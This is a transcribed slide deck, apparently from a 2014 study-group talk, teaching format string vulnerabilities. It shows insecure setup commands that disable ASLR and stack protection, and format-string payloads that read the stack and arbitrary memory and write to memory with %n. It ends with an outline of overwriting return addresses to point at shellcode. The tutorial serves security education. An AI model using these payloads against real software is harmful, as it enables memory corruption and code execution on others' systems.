Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

[MOSUT] Format String Attacks

1,503 views

Published on

一個學習format string attack與分享的故事
Outline:
*Illustrating format string vulnerabilities
*A case study
+fsa.c
+Compile and setup insecure environment
+Viewing the stack
+Viewing Memory at any location
+Overwriting of arbitrary memory
*So, You Can…

  • Be the first to comment

[MOSUT] Format String Attacks

  1. 1. Format String Attacks AJ 2014.1.18
  2. 2. About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
  3. 3. Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
  4. 4. Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
  5. 5. A Case Study: fsa.c
  6. 6. A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
  7. 7. Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
  8. 8. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
  9. 9. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
  10. 10. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
  11. 11. Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
  12. 12. Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
  13. 13. Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
  14. 14. So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
  15. 15. You can overwrite arbitrary memory, if there are format string vulnerabilities
  16. 16. Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf

×